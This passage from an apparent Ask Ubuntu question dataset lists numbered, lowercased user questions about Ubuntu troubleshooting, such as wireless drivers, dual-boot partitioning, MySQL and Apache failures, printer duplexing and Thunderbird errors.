were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have checked my sources.list and the is no reference to this . how to remove this code from trying to install it every time ?
173655	my dell inspiron 8600 wifi wo n't work	the wireless internet connection on my dell inspiron 8500 is n't working . i was told to get wifi on it that i need to remove the bcmwx kernel module and install a b43-something . is this right ? what does this advice mean and how can i do it ?
173656	partitioning the rigid disc to install ubuntu alongside with windows 7	i want to install ubuntu alongside with windows , partitioning the system . i readed some tutorials online and it was said that i can have only 4 primary partitions . my windows 7 system shows me 3 partitions already : oem partition , recovery partition and os ( c : ) partition . is it still possible to install ubuntu satisfactorily ?
173668	wireless down in dual boot of ubuntu , but works on windows side	my battery ran completely out yesterday while i was working on my lappy . i plugged it in to a power source but my internet connection will not take hold now . the wireless router is working , and shows up . but i get repeated requests from ubuntu to enter the key , etc . the laptop is a dual boot , with the problem being in the ubuntu partition , which is why i am working at the moment from the windows side , where i can access that same router , and post this plea for help . i have rebooted the router and modem . no dice . and , i deleted the connection from the network manager , and re-added it . still no internet in ubuntu . someone had posted a note about the dpch being stuck - to go into the terminal and restart the network services from there . but , they did not provide the correct command sequence . any help ? please ?
173669	apply primary-toolbar background behind gtkentry widget with gtk3	in pygi ( gtk3 ) , how can i make a gtkentry widget appear against the same background applied ( by the user 's theme ) to the primary toolbar . i tried adding the same style class like this : entry.get_style_context ( ) .add_class ( gtk.style_class_primary_toolbar ) but that class does n't seem to be observed on a widget that is n't a gtktoolbar . so how can i cue the user 's theme to apply the same styles behind a gtkentry widget ? ( if it matters , i have the gtkentry in the first cell of a gtkhbox container . but even when i apply a fixed gradient to that hbox the whole cell holding the gtkentry seems to mask out the background of the hbox with a flat background colour . ) thanks .
173670	finding out what filesystem a casper-rw file is formated with ?	i have an old casper-rw file i 'd like to loop mount but i ca n't determine what filesystem it was created with . what i do know is that i used unetbootin to create it . i tried to mount it with all the ones i could think of off the top of my head , ext4 , ext3 , ext2 , reiserfs , and vfat ... something tells me that it might be squashfs , but i do n't know what argument to use to mount it with squash .
173676	how to make a usb stick swap disk ?	ok , i know this sounds a bit silly and solid state drives like a usb flash stick are probly the last thing on earth you want to use as a swap disk since they could go bad pretty quick from all the readwrites . regardless of the bad idea aspect of this i would like to know how to make one of my old 4 gig usb sticks my designated swap disk so that when my computer running ubuntu precise starts up , it will use the usb stick as swap . couple of twists to add to the challenge : 1 ) the computer i 'm using is my wife 's laptop core2 duo and has 4gigs of ram 2 ) she likes ubuntu but does n't trust me to backup her hd so i have her running ubuntu 12.04 on a 16gb highspeed usb 2 flash memory stick with persistency . 3 ) the second usb stick will be my swap disk and when the live usb starts up i want it to do all the heavy swap writing etc on the second usb stick anyone up to the challenge . trivial maybe but please indulge me : d
173677	wireless network adapter manufacturers with best linux compatibility record ?	just for my own knowledge ( and also because we 're going to make a local fry 's run soon for a bunch of adapters for various desktops ) , are there any wireless network adapter manufacturers that i should generally stick to for zero hassles ? i googled and found a bunch of websites with ( often outdated or conflicting ) lists of specific cards , but i 'm hoping for more general rules of thumb , so i 'm not always trying to google for sufficient evidence of a certain card working and sufficiently little evidence of that card not working . ( or at the very least , which such website is most comprehensive , most accurate , and i should heed the most ? ) [ just today , i wasted a bunch of time on getting this trendnet tew-423pi/a c1.2r working on an ubuntu 10.04 box - ubuntu loads rtl8180 drivers , which caused very weak signal and disconnections within 10 minutes . i downloaded and built rtl8185 drivers , and while i have stronger signal , i still get disconnected , albeit less frequently . ]
173678	thunderbird 14 does not work with gmail on ubuntu 12.04	i have been attempting to set up thunderbird from a default install of ubuntu 12.04lts desktop . attempting to click on the inbox gives : the current operation on inbox did not succeed . the mail server for account blah @ gmail.com responded : system error ( failure ) i 've also changed the servers to imap.gmail.com from imap.googlemail.com , but to no avail . i see my folders , but i ca n't see inside them . i 've also enabled smtp , pop , and imap from the google account settings side from within the web client . any ideas ?
173683	how to use deviantart on ubuntu ?	i have ubuntu , and i 'm trying to chat like i normally do on deviantart , with more than one chat open at once . however , i can not use tab normally ( the tab button makes the cursor vanish rather than helping me type people 's usernames ) , and every time i hit enter , the page refreshes . what am i doing wrong , or how on earth can i fix this ? i need to do both of those things without constant refreshing in order to function in the da chats properly .
173687	how do i install 10.04 wallpapers on 11.04 ?	i 've been trying `` sudo apt-get install ubuntu-wallpapers-oneiric '' , using natty , maverick , lucid and karmic as shown in how do i install wallpapers from older releases ? but i keep getting `` ca n't locate the package ubuntu-wallpapers-oneiric '' also used the info here : where can i find all the wallpapers ever included ? but there is no package to be installed and the pics are a little low res for me . thanks in advance !
173688	where is the supported graphics card list by bumblebee project ?	i want to get the latest list . i ca n't find it on main page of bumblebee . is that support gtx670m ? thank you~
173691	wubi device /dev/loop0 full . how to get more space ?	$ df -h filesystem size used avail use % mounted on /dev/loop0 17g 15g 838m 95 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 762m 928k 761m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 940k 1.9g 1 % /run/shm /dev/sda5 196g 18g 178g 9 % /host /dev/mmcblk0p1 7.4g 365m 7.1g 5 % /media/3064-6365 /dev/sdb1 961m 157m 805m 17 % /media/44c7-e9e7 /dev/sdc1 932g 8.4g 924g 1 % /media/my book /dev/sda2 100m 25m 76m 25 % /media/system reserved /dev/sda3 240g 42g 199g 18 % /media/gateway owner @ ubuntu : ~ $ above is terminal output . i realize that i can not down load files because of the low space on /dev/loop0 . but , i do not know how to fix . would like to use part of /dev/sda5 , and /dev/sda3 is windows 7 ; /dev/sdc1 is an ext . hd .
173694	making data partition default partition	recently i installed ubuntu and fedora on my system . each os has its own partition and i made a data partition to save my personal files . now in ubuntu when i open terminal its default location is ubuntu 's home folder but i want to change it to data partition . i also want to change my home directory . i mean when i type cd ~ i want to go to data partition . is this possible ? if so , how can i do it ? i want new applications to default to the data partition not in my old home . and also change all folders location in home like music , downloads , etc to data partition .
173710	how to launch ask ubuntu lens ?	i have installed ask ubuntu lens on my 12.04 desktop some time back and i could see it in my installed applications from ubuntu software centre . but i can not find it on the dash . how i can launch it ? i installed alacarte hoping that i can see it there , but could not find it there either . note : i reviewed the question here , but could not find answer to my specific question .
173711	no sound in 12.04 - excapt in wine	i have a strange problem on my 12.04 lts machine : sound works ok in wine ( using spotify for instance ) , but none of the native linux apps are able to produce any sound . i tested rythmbox and vlc player , and they both show the same behaviour ; they seem to play ok ( progress bar moving etc ) but no sound can be heard anywhere .
173720	how to compare performance between desktop graphics card and laptop graphics card ?	for example , i know gt640 is better than gt640m . 1.is gt630 better then gt640m ? 2.is gt620 better then gt640m ? 3.is gt610 better then gt640m ? how to check for their performance if i do n't have any card before i want to buy ? thank you~
173721	how do i update my nvidia modules after updating my kernel ?	every time there 's a kernel update , nvidia graphics drivers stops working because there 's not a valid kernel module . what is the ubuntu way to 'recompile ' the nvidia module for the new kernel ? should n't it be done automatically ? i am suffering a bug ?
173723	need help with ubuntu installation	i have a toshiba satellite-l655 laptop with windows 7 , and i want to install 12.04 lts . the problem is that i have a problem with windows . the problem is that , when i turn on my laptop , it gives this options : `` start up repair ( recommended ) and `` start up normally '' . if i choose start up normally it goes to start up repair anyway . when start up repair runs , it says `` startup repair is checking your system for problems '' . this goes for like 7 minutes , then it says that it could n't fix the problem , so i ca n't use windows . i was wondering if i was able to install ubuntu in somehow . if possible , please tell me and help me .
173731	i uninstalled mono , how do i reinstall it ?	i uninstalled mono in 12.04 by : sudo apt-get remove mono-* but afterward the theme of ubuntu changed to an ugly one . it seems that some of the themes depend on mono ! ! ! my question is how can i revert packages removed by that command ?
173738	pantheon files opens home folder when clicking trash in launcher	i switched from nautilus to marlin but was no longer under development so switched to pantheon files , whose now under elementary os developers . but whenever i click the trash icon from launcher , phanteon files opens the home folder . is it a bug that i need to file this to it 's developers or can someone here can help me ? using pantheon files 0.1 on my 12.04 precise .
173739	lenovo g550 - intel gma4500 slowness on 12.04	my machine is lenovo g550 with intel gma4500 and clean install of ubuntu 12.04 every new version of ubuntu and maby sometimes when i have time i came to ubuntu and give it a try . but every time i meet with problems . when i 'd installed ubuntu , i feel that everything is slow and a little bit sluggish . my friend have tried me help and told me , that i shoud try this things : $ glxinfo | grep direct $ glxinfo | grep opengl results : glxinfo | grep opengl opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri mobile intel速 gm45 express chipset x86/mmx/sse2 opengl version string : 2.1 mesa 8.0.2 opengl shading language version string : 1.20 opengl extensions : $ glxinfo | grep direct direct rendering : yes and with : glxgears i got 60fps thanks to vsync no more for sure ... so hw acceleration seems to be working , but i am not 100 % sure about it . but on the other side , maby i am spoiled with windows 8 ... i do n't think so . opening nautilus for the first time is slow , unity dash last 2sec to open . opening chrome and ff is slow too and using it too . i really want to use ubuntu for my daily use and helps it to improve and maby later write some program for its . i think , that ubuntu has a big potential , but these things make me crazy . could someone help me , please ? = ) what i have to do , to make it smooth ? ps : unity2d works like that ...
173742	postfix server - wordpress	i have installed postfix on my ubuntu server . i want it to send mail to my subscribers on the blog . i have installed the smtp plugin for wordpress so its not using php mail . but any time anybody signs up to the blog so they can comment i get a error in my mail.log file . disconnect from localhost [ 127.0.0.1 ] no idea . it just wont send any mail . the test mail seems to work all the time without tls and sometimes without it . its flaky . the plugin is a good one and is used on lots of blogs and sites so there is no problem with that . this is the settings for the plugin . and the test email at the top works if i fire one off to my gmail account . no idea why it wont work when people sign up to the blog though ? mus be something in my postfix configs but then why does it work when sending a test mail ? any ideas thanks ? edit : this is a test of mx records on mxtoolbox.com
173747	can not set up resolution for screen on an asus a55v	i have an asus a55v which comes with the infamous nvidia optimus chipset . i installed bumblebee , and tested it correctly with optirun glxspheres . the problem is that i can not change the screen resolution , from both the nvidia panel and the ubuntu display utility , which is fixed at 640x480 . the strange thing is that if i attach an external monitor , it 's correctly detected and i can configure it normally with a decent resolution . laptop screen 's resolution is fixed no matter if the external monitor is plugged in or not . and a curious thing is that even if the external monitor is unplugged , it still shows at the nvidia settings ... any hints on how to solve this ? edit : using xrandr seems to work to add a new resolution and set it up , but the display is limited to the center of the screen . here 's a screenshot so you know what i mean : thanks in advance
173750	huawei e353 ussd codes and message ?	i am using this device . bus 002 device 005 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard but , i am unable to send and receive messages . and how do i use ussd code ? modem works fine on 3g networks . only i am not able to check my usage via ussd codes . i have treid using gammu but it is not recognizing my modem .
173751	mysql keeps failing to install	first i clean up previous installation root @ ip-10-134-10-182 : ~ # rm -rf /var/lib/mysql root @ ip-10-134-10-182 : ~ # rm -f /var/lib/dpkg/lock root @ ip-10-134-10-182 : ~ # rm -f /var/cache/apt/archives/lock root @ ip-10-134-10-182 : ~ # rm -f /var/lib/aptitude/lock root @ ip-10-134-10-182 : ~ # rm -f /var/lib/apt/lists/lock root @ ip-10-134-10-182 : ~ # root @ ip-10-134-10-182 : ~ # sudo aptitude purge mysql-server reading package lists ... done building dependency tree reading state information ... done reading extended state information initializing package states ... done no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 38 not upgraded . need to get 0b of archives . after unpacking 0b will be used . writing extended state information ... done reading package lists ... done building dependency tree reading state information ... done reading extended state information initializing package states ... done so everything is clean then i restart the amazon ec sudo aptitude install mysql-server two things usually happen first ubuntu @ ip-10-134-10-182 : ~ $ sudo aptitude install mysql-server reading package lists ... done building dependency tree reading state information ... done reading extended state information initializing package states ... done the following new packages will be installed : libhtml-template-perl { a } mysql-server mysql-server-5.1 { a } mysql-server-core-5.1 { a } 0 packages upgraded , 4 newly installed , 0 to remove and 38 not upgraded . need to get 0b/12.2mb of archives . after unpacking 29.7mb will be used . do you want to continue ? [ y/n/ ? ] y writing extended state information ... done preconfiguring packages ... selecting previously deselected package mysql-server-core-5.1 . ( reading database ... 28329 files and directories currently installed . ) unpacking mysql-server-core-5.1 ( from ... /mysql-server-core-5.1_5.1.63-0ubuntu0.10.04.1_amd64.deb ) ... selecting previously deselected package mysql-server-5.1 . unpacking mysql-server-5.1 ( from ... /mysql-server-5.1_5.1.63-0ubuntu0.10.04.1_amd64.deb ) ... selecting previously deselected package libhtml-template-perl . unpacking libhtml-template-perl ( from ... /libhtml-template-perl_2.9-1_all.deb ) ... selecting previously deselected package mysql-server . unpacking mysql-server ( from ... /mysql-server_5.1.63-0ubuntu0.10.04.1_all.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... setting up mysql-server-core-5.1 ( 5.1.63-0ubuntu0.10.04.1 ) ... setting up mysql-server-5.1 ( 5.1.63-0ubuntu0.10.04.1 ) ... 120809 9:44:46 [ warning ] ' -- skip-locking ' is deprecated and will be removed in a future release . please use ' -- skip-external-locking ' instead . /usr/sbin/mysqld : file './mysql-bin.index ' not found ( errcode : 13 ) 120809 9:44:46 [ error ] aborting 120809 9:44:46 [ note ] /usr/sbin/mysqld : shutdown complete and then hang there . notice that it does n't make sense that they complain about ./mysql.bin.index it 's located at /var/lib/mysql and i already removed that . another thing that happen is no error at all but the whole thing just get stuck at setting mysql server and not moving forward . root @ ip-10-134-10-182 : /var/lib # ls /var/lib/mysql -l ls : can not access /var/lib/mysql : no such file or directory root @ ip-10-134-10-182 : /var/lib # sudo aptitude install mysql-server reading package lists ... done building dependency tree reading state information ... done reading extended state information initializing package states ... done the following new packages will be installed : libhtml-template-perl { a } mysql-server mysql-server-5.1 { a } mysql-server-core-5.1 { a } 0 packages upgraded , 4 newly installed , 0 to remove and 38 not upgraded . need to get 0b/12.2mb of archives . after unpacking 29.7mb will be used . do you want to continue ? [ y/n/ ? ] y writing extended state information ... done preconfiguring packages ... selecting previously deselected package mysql-server-core-5.1 . ( reading database ... 28329 files and directories currently installed . ) unpacking mysql-server-core-5.1 ( from ... /mysql-server-core-5.1_5.1.63-0ubuntu0.10.04.1_amd64.deb ) ... selecting previously deselected package mysql-server-5.1 . unpacking mysql-server-5.1 ( from ... /mysql-server-5.1_5.1.63-0ubuntu0.10.04.1_amd64.deb ) ... selecting previously deselected package libhtml-template-perl . unpacking libhtml-template-perl ( from ... /libhtml-template-perl_2.9-1_all.deb ) ... selecting previously deselected package mysql-server . unpacking mysql-server ( from ... /mysql-server_5.1.63-0ubuntu0.10.04.1_all.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... setting up mysql-server-core-5.1 ( 5.1.63-0ubuntu0.10.04.1 ) ... setting up mysql-server-5.1 ( 5.1.63-0ubuntu0.10.04.1 ) ... that 's it . nothing happen . it just stay there for a very long time .
173752	how do i get duplex printing working on a samsung scx 3201 g ?	i am using this samsing scx 3201g . i have installed samsung unified drivers from samsung 's site . it is does n't have any option for duplex printing . using same printer on windows 7 supports duplex printing . long edge short edge settings . how do i configure these to work in ubuntu 12.10 if my printer supports it ?
173761	where should i put this line `` source ~/.rvm/scripts/rvm '' ?	where should i put this line source ~/.rvm/scripts/rvm it make it work when system start or how to install rvm on ubuntu correctly for all users in my system ?
173765	compilation of erld on ubuntu 12.04	i am compiling erld , a program to run erlang programs as a unix daemon , see https : //github.com/shoretel-inc/erld/wiki the make instructions which i followed are here : https : //github.com/shoretel-inc/erld/blob/master/readme in the middle of the make step there is an error : in file included from slay.c:25:0 : debug.h:41:6 : warning : conflicting types for built-in function âlogâ [ enabled by default ] slay.c:29:45 : fatal error : proc/readproc.h : no such file or directory compilation terminated . make [ 1 ] : *** [ erld-slay.o ] error 1 make [ 1 ] : leaving directory `/home/ad/erld/c_src' make : *** [ all-recursive ] error 1 this is ubuntu 12.04 server 64 : $ uname -a linux lfe1 3.2.0-26-virtual # 41-ubuntu smp thu jun 14 18:08:54 utc 2012 x86_64 x86_64 x86_64 gnu/linux i was not able to add the tag `` erlang '' to this question . maybe someone with more points can do it .
173770	use windows touchpad driver in ubuntu	is it possible to use windows touchpad driver in ubuntu ? i have a dell n5110 and the touchpad is not recognized . i can not use scroll , and most annoying , while typing the pointer usually jumps if the touchpad is touched . i see that there are lots of questions here and on the internet about this issue . some claim to work , but i tried everything with no results .
173781	vmware player 4.04 installing on ubuntu 12.04	i downloaded vmware player 4.04 and run into the problem of virtual network device fail . after googling a bit , i found how do i install vmware player 4.0.3 ? and applied as this answer suggest , which is the following : 1 ) i downloaded the tarball http : //weltall.heliohost.org/wordpress/wp-content/uploads/2012/01/vmware802fixlinux320.tar.gz 2 ) change the plreqver=4.04 3 ) and run it . everything looks working until i try to run vmware player again . now , it failed at the step `` virtual machine monitor '' which was ok before i applied the patch . i guess the patch skerewed the whole vmware kernel modules . any help ?
173783	what efforts are there and what are the differences in webapps ?	so i read some ubuntu news sites . in the past months i saw many different articles about the integration of web-sites to the unity-desktop . from what i understood there are at least two different efforts : ubuntu web-apps fogger what would be the main differences , and are there more efforts that do the same ? i am a bit unclear on what i should choose to install .
173785	install regex plugin for gedit	i am using ubuntu 12.04.i want to install regex search and replace plugin for gedit.so can some one please tell me where can i get it and install it.any help and suggestions will be highly appreciable .
173800	thunar icons missing	i installed thunar yesterday but on starting up this morning , i found that all of the folder icons had vanished . i 'm using i3wm ( but the icons were visible in i3 as of yesterday ) . any idea why they might have disappeared or how i could retrieve them ? thanks .
173801	use swap partition for hibernation	i just created a swap partition out of my useless usb drive ( 4gb ) . i 'm successfully using it , it shows in the top command and i also edited the etc/fstab to automatically mount it at startup . my problem is , while switching on my computer , i see this message with all the text hibernation : resume : no device specified what should i do ? ?
173802	printer manual duplex emulation ?	my printer have emulated duplex mode under windows 7 . in which it says `` turn all papers downside `` . but my printer driver in ubuntu does n't support long edge and short edge duplex emulation . its a duplex emulation , not a real duplex machines . it ask for turning paper in reverse order when printing . i need similar thing for linux to save some paper . how can this be done . note printing odd and even pages causes problem in case of multiple page per sheet . printer samsung scx3200 series ( scx 3201g )
173806	give external usb ( ext4 ) drive a short name	when i plug in my usb hard drive that is formatted with an ext4 partition , the drive is mounted as expected , but at a path that contains the long uuid of the disk ; something like : /media/a1f2e5f6-a9bc-dd2a-c2c9-1f48c39b39ee is there a way to automount the drive at a path that is shorter and more snappy ? e.g . /media/my_external_hd
173811	ca n't transfer photos from kodak easy share c195 camera	i am unable to mount and transfer photos from my kodak c195 digital camera to my laptop running ubuntu 12.04 . is there software that i need to download to get my camera to mount to my os ? i have tried using rapid photo downloader and the original software that came with ubuntu but nothing will allow me to view all and transfer all photos from my camera to ubuntu .
173816	samba and nfs conflicts ?	i 'm using nfs server for quite some time now , and never needed a samba share . but now i 'll need to connect one windows pc to a network , and i should use samba share on the same server . i 'd like to install samba and set it up , but without touching the current nfs configurations for the rest of the lan , is this possible , dangerous in any way ? it 's very important to me that the current nfs configuration stays untouched .
173818	force tabs in chrome	i 'm running ubuntu 12.04 . chrome remembers what tabs were pinned , and re-opens them , most of the time . sometimes , on my computer , if the browser dies , it forgets and i have to redo them . i have found that i should be able to force it to always open specified pinned tabs , but am unsure how to do this in unity . i have tried modifying the first exec line in /usr/share/applications/google-chrome.desktop , but when i do , it does n't work and it removes chrome from my side bar , until i re-add it . i am trying to modify it like this : exec=/opt/google/chrome/google-chrome -- pinned-tab-count=3 http : //www.gmail.com/ http : //internal.server1/ https : //internal.server2/ do i have my syntax wrong , or is that now how i should modify its default behavior , or both ?
173821	how can i check what was installed for an apt package ?	i just installed the package autojump through apt and now i have no idea how to actually use it . newer versions uses a j alias , but apparently the apt version does not . in interest of finding out which binaries i should execute to use autojump , is there a way to see what exactly was installed by package ?
173822	how to make thunderbird not use bing as search engine ?	when i type something in thunderbird 's search bar , the first item that pops up is a bing search for that term . is there a way to remove bing ? i do n't really need thunderbird to be able to search the web . so just removing it and leaving nothing is acceptable , but replacing it with , say , google ( or anything that 's not bing ) works as well . i perused all the settings dialogs and preferences and could n't find anything of the sort .
173829	ca n't decompress data ; zlib not available	i already have python2.7 but due to certain reasons i need to install python2.4 . so , i installed python2.4 and when i run ez_setup.py with python2.4/python ez_setup.py , i got the error that says ca n't decompress data ; zlib not available . i installed zlib1g and zlib1g-dev as well . i restarted my console but i am still getting this error . can anyone help me with this ? i got ez_setup.py from this link . when i do which zlib in the console it says zlib not found
173832	how to rename an application while developing with quickly	i 've been developing an application using pygi and quickly , and i now need to rename it . is there any quick way to change all of the app name references in a quickly application , or will i just need to do it by hand ?
173836	that pesky intel centrino wireless n + wimax 6150 wireless card	i 'm new to linux and just got ubuntu 12.04 up and running on my asus laptop last night . aside from the wireless everything seems to be working . the card is able to recognize networks but can not make a full connection . after i enter my password it will try to connect before asking for the password again after a few minutes . i know the issue is n't the password because i checked that i had the right one . i 've done some poking around trying to find a way to get it work . linux recognizes the card as well . i found a link to some drivers in a question someone had about a wimax 6250 card and am curious if anyone knows if they would also work for the 6150 i have in my machine . if not what can i do ?
173839	tar command fails on bigsize ( 191 gb ) file	in ubuntu , tar command fails while copying bigfile of size 191gb from disk to tape device and gives below error . tar -cvf /dev/st0 /mtpt/ntfs in /mtpt/ntfs , we have files of size 2gb to 5gb and they are getting copied and while copying filesize of 191gb it fails . on the monitor we get below tar : /dev/st0 : can not write : input/output error and in kern log we get below error message - aug 2 13:12:12 digitalassetmgmt kernel : [ 162046.927292 ] rport-5:0-2 : blocked fc remote port time out : removing target and saving binding aug 2 13:12:12 digitalassetmgmt kernel : [ 162046.960315 ] st0 : error e0000 ( driver bt 0x0 , host bt 0xe ) . aug 2 13:12:12 digitalassetmgmt kernel : [ 162046.960677 ] scsi 5:0:2:0 : rejecting i/o to dead device aug 2 13:12:12 digitalassetmgmt kernel : [ 162046.977006 ] st0 : error 10000 ( driver bt 0x0 , host bt 0x1 ) . aug 2 13:12:12 digitalassetmgmt kernel : [ 162046.977009 ] st0 : error on write filemark . aug 2 13:12:12 digitalassetmgmt kernel : [ 162046.993200 ] scsi 5:0:2:0 : rejecting i/o to dead device aug 2 13:12:12 digitalassetmgmt kernel : [ 162047.009194 ] st0 : error 10000 ( driver bt 0x0 , host bt 0x1 ) . aug 2 13:12:15 digitalassetmgmt kernel : [ 162050.307793 ] scsi 5:0:2:0 : sequential-access ibm ult3580-hh4 b171 pq : 0 ansi : 6 please help us . thanks and regards , robert
173848	'root disk does not exist ' - how do i get it back ?	when booting ubuntu i suddenly get the information that my root disk does not exist . i am running wubi and ubuntu version 10.04 . i tried the following : rebooting windows , then rebooting ubuntu . entering ubuntu via usb-version ( to save some of my data ) . searching for lost file via recuva in windows ( xp ) . chkdsk via windows . none of it worked . root disk is still missing . i definitely need some of the data which is saved on ubuntu . i do n't have a back up file ( will def do that in the future ) . is reinstallation the only way out ? or what else can i do ? i really need my data ! help is always appreciated . thanks so much in advance ! saskia
173849	what command-line options are available for ubuntu one ?	is there a place i can see the command line switches for ubuntu one ? at the moment , i only know of two : ' -- minimized ' and ' -- with-icon ' . they were included in the shortcut when ubuntu one installed on my windows machine . i mainly need to know if there is one to start the ubuntu one file sync from the command line so i can build a custom scheduler . i do n't think the difference in the operating systems matter because all commands thus far are controlled through the 'ubuntuone-control-panel-qt ' executable . i could be mistaken though .
173850	how to install printer drivers	i have two questions : once downloaded install it directly without uninstalling window 7 right ? where do i download drivers for the printers ? thank you !
173851	can i backup my windows partition with acronis and then reinstall it inside a virtual machine ?	currently i use windows 7 , which is located on the c partition . can i just use acronis to backup the entire c partition , then install ubuntu 12.04 , set up virtualbox under ubuntu and then restore c partition ( windows 7 and all programs ) using acronis inside virtualbox ?
173857	how can i change my panels to be dark like this screenshot ?	i 've installed mate/mintmenu on my ubuntu 12.04lts installation : i 've changed the theme to ambiance , in an attempt to make it look like this screenshot : i ca n't get my panels dark like the one in that screenshot . any help ?
173858	need help : multiple displays on ubuntu 12.04 with nvidia driver	i have installed ubuntu 12.04 64-bit on my asus k43sm laptop with nvidia geforce gt 630m . i am having trouble connecting another monitor ( samsung sms19a100 ) as i do n't know where to start the configuration . i have read about editing xorg.conf but i am still not familiar with it and it may be very risky . need help . thanks . [ edit ] btw , i am planning to use twinview , but i still need more details from the experienced . : p
173862	uninstalled kde-dependencies , ca n't install kile again	ubuntu 11.04 hi everybody , this morning i was running a little bit short on hdd space and had the bright idea to uninstall all those weird kde-related libraries i had installed . turns out , i should have thought that through better , since it literally killed my kile . i tried recovering it , either by synaptic , ubuntu software center or apt-get , but i always get dependency problems , like this one : the following packages have unmet dependencies : kile : depends : kdebase-runtime but it is not going to be installed depends : konsole but it is not going to be installed e : broken packages easy , i thought , sudo apt-get of each of those components , but turns out it does n't work . after half an hour trying to install things , i just give up and hope for your help , any insight : ) ? cheers ,
173868	upgrade from 10.04 to 12.04 without internet but with local repo mirror ?	i created the local mirror to upgrade all lucid workstations in my network to precise . the problem is that the upgrade tool ( link below ) - precise.tar.gz always download packages from archive.ubuntu.com ( 19 % [ waiting for headers ] [ connecting to archive.ubuntu.com ( 91.189.92.153 ) ] ) . i edited the precise.tar.gz file by modifying some files of it , putting it to my local mirror , modified the meta-release url to my local mirror . running do-release-upgrade i have the error below . my question is how to sign the precise.tar.gz package myself ? checking for a new ubuntu release done upgrade tool signature done upgrade tool done downloading authenticate 'precise.tar.gz ' against 'precise.tar.gz.gpg' exception from gpg : gnupg exited non-zero , with code 1 debug information : gpg : signature made mon 04 jun 2012 08:40:31 pm ict using dsa key id 437d05b5 gpg : /tmp/tmpmaz62f/trustdb.gpg : trustdb created gpg : bad signature from `` ubuntu archive automatic signing key `` authentication failed authenticating the upgrade failed . there may be a problem with the network or with the server . dist : precise name : precise pangolin version : 12.04 lts date : thu , 26 apr 2012 12:04:00 utc supported : 1 description : this is the 12.04 lts release release-file : http : //archive.ubuntu.com/ubuntu/dists/precise/release releasenotes : http : //archive.ubuntu.com/ubuntu/dists/precise-security/main/dist-upgrader-all/current/releaseannouncement releasenoteshtml : http : //archive.ubuntu.com/ubuntu/dists/precise-security/main/dist-upgrader-all/current/releaseannouncement.html upgradetool : http : //archive.ubuntu.com/ubuntu/dists/precise-security/main/dist-upgrader-all/current/precise.tar.gz upgradetoolsignature : http : //archive.ubuntu.com/ubuntu/dists/precise-security/main/dist-upgrader-all/current/precise.tar.gz.gpg
173871	dlna server/control point like windows media player	yes , i know that most questions ending with `` like windows '' are odd , but this one really bothers me ; ) if you ever used some dlna renderer ( in my case dlna-enabled loudspeakers ) you probably know the handy `` play to '' -feature . from my knowledge of dlna stuff i would guess , that windows media player is both a dlna server and control point here , so my question is : is there any similar software for linux accomplishing the same thing with minimal configuration effort ? i normally use banshee for my music library , but it does n't seem that there is anything available for banshee ...
173881	not able to start apache2 on ubuntu	when i am trying to restart apache2 on ubuntu . i am getting the following message restarting web server apache2 ... waiting what could be the problem this is my etc/hosts file 127.0.0.1 localhost 127.0.1.1 myname-rf511-rf411-rf711 # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters i modified my /etc/apache2/httpd.conf servername localhost errors in error.log file [ thu aug 09 17:33:03 2012 ] [ notice ] caught sigterm , shutting down [ thu aug 09 17:33:04 2012 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.2 with suhosin-patch configured -- resuming normal operations [ thu aug 09 17:34:38 2012 ] [ notice ] caught sigterm , shutting down [ thu aug 09 17:34:48 2012 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.2 with suhosin-patch configured -- resuming normal operations [ thu aug 09 17:34:57 2012 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ thu aug 09 18:39:47 2012 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ fri aug 10 02:45:33 2012 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.2 with suhosin-patch configured -- resuming normal operations [ fri aug 10 02:47:33 2012 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ fri aug 10 09:08:09 2012 ] [ notice ] caught sigterm , shutting down [ fri aug 10 09:08:10 2012 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.2 with suhosin-patch configured -- resuming normal operations
173883	gtk3 and gtk2 themes checkbox	i have a good theme . but there is one disadvantage . i do n't see if checkbox is checked or unchecked until i place mouse cursor above it . can you tell me what i should change in the theme to be able see checkbox state ? some example : in thunderbird this problem is present : the tick marks not visible ( because the background color is white and the tick color is white too ) . but in nautilus i can see the checkbox states , it is not a common tick mark , the ckeckbox changes its color . from the vasa1 comment could be inferred that i have this problem with gtk2 theme . theme name : shiki-nouveau-dust
173886	installing ubuntu 12.04 lts alongwith windows xp in two different hdds	i have two hdds . first hdd has four partitions with windows xp in the first partition second has two partitions and 15gb unallocated space . i tried to install ubuntu 12.04 lts in the second hdd by using unallocated space . i tried for 6 times . each time it got installed , but after first restart , it directly boots windows xp in the first hdd and no boot options appear . every time i found that the ubuntu installation used unallocated space and made two partitions one ext3 and other linux swap . i do n't know what went wrong . during installation , ubuntu detected windows xp . can anybody help me ?
173887	ubuntu one : failed handshake	in ubuntu 12.04 64-bit : i get the following when trying to connect or sync ubuntu one : traceback ( most recent call last ) : failure : ubuntu_sso.utils.webclient.common.webclienterror : ( u'ssl handshake failed ' , u '' ) not sure how to proceed to troubleshoot . how to get around this ?
